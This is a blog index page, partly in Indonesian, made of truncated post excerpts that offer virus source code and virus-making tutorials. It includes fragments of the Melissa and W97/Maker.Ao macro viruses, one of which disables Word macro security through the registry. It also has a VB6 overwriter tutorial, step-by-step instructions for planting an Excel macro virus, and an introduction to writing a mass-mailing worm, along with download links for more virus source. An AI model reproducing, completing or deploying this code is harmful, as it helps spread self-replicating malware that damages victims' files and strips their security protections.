virus
W32.Foredge
this is a source code of virus w32.foredge detect by norton you can download here
Read Full Post | Make a Comment ( 4 so far )HTML virus
HTML Viruses
Introduction
============
A new class of viruses has recently appeared that utilize the VBScript
scripting language to infect web pages. While these viruses are causing a lot
of worry, they are not as dangerous, as some would have you believe, for two
reasons:
1. In order for the virus to infect other pages, it must be run from a
local copy [...]
virus tutorial
I know that overwritters suck, they have no chance of spreading and they are not ” intelligent ” viruses. Dispite all this overwritters can help you understand the basics of the REAL viruses. I will give you the code first and then I will go over it.
Option Explicit
Dim myarray() As Byte
Dim victim As String
Const mysize [...]
simple virus
A simple virus script created by Ms visual Basic 6.0 Download here
Read Full Post | Make a Comment ( 1 so far )macro virus
this is a virus macro n this script write in microsoft excel
MAKE Virus:
open new excel workbooks then menu tools macro VB editor
right klik in VBA Project – insert module
then copy Paste script in new module
tekan F8 untuk trace script
—————————— begin of script ———————————————-
‘USE THIS SCRIPT As YOUR OWN RISK
‘This is For my wife If thats [...]
Easy make avirus
Cara Gampang Bikin Virus
Kamu pasti masih inget dengan virus worm yang sempat menghebohkan internet beberapa waktu yang lalu : Anna Kournikova. Worm yang menginfeksi Windows beserta Outlook Exressnya, akan mengirim sendiri pesan virus ke seluruh email yang terdapat pada address book.
Sebenarnya untuk membuat worm semacam itu kamu tidak harus menjadi seorang programmer handal. Cukup bisa [...]
Mengenal Virus Computer
Saat Ini, pastilah kita semua selaku konsumen/pengguna jasa komputer dan jaringan ( internet ) sudah sangat sering mendengar istilah “virus” yang terkadang meresahkan kita. Tulisan ini akan mengupas lebih jauh mengenai virus, yang nantinya diharapkan dapat membuat kita semua mengerti dan memahami tentang virus.
ASAL MUASAL VIRUS
1949, John von Neumann, menggungkapkan ” teori self [...]
Disable registry editor
Disable registry editor
Anda pernah berpikir untuk mendisable regedit ? Hal ini sangat berguna untuk mencegah orang lain mengubah setting registry komputer anda !!! Untuk melakukan itu Anda dapat mengubah seting registry seperti yang tercantum pada tabel di bawah.
Key
HKEY_CURRENT_USER\SOFTWARE\Microsoft\WindowsCurrentVersion\Policies\System
Value Name
DisableRegistryTools
Data Type
REG_DWORD (DWORD Value)
Data
(0 = enable [...]
W97/Maker.Ao virus macro
W97/Maker.Ao
Private Sub Document_Close()
On Error Resume Next
Const Marker = “<- this is a marker!”
‘Declare Variables
Dim SaveDocument, SaveNormalTemplate, _
DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
‘Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
‘Switch the VirusProtection [...]
melisa source code
Melisa Source Code
this Sript is source code from Melisa macro Virus.
Private Sub AutoOpen()
On Error Resume Next
p$ = “clone”
If System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, “Level”) <> “” Then
CommandBars(“Macro”).Controls(“Security…”).Enabled = False
System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, “Level”) = 1&
Else
p$ = “clone”
CommandBars(“Tools”).Controls(“Macro”).Enabled [...]
« Previous Entries


